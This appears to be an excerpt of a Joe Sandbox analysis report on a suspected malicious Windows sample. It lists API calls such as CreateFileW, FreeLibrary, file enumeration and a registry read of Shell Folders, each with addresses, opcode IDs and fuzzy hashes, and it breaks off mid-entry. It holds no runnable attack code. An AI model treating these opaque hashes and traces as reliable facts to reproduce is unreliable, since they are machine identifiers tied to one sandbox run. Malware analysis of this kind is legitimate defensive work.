                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                              • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                              • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                              APIs
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??3@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                              APIs
                                                                                                                                                              • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EnumNamesResource
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3334572018-0
                                                                                                                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                              APIs
                                                                                                                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                              • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                              • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                              • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                              • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                              • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004095FC
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3655998216-0
                                                                                                                                                              • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                              • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00445426
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1828521557-0
                                                                                                                                                              • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                              • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@FilePointermemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 609303285-0
                                                                                                                                                              • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                                                                              • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                              • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                                                                              • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2081463915-0
                                                                                                                                                              • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                              • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2136311172-0
                                                                                                                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@??3@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1936579350-0
                                                                                                                                                              • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
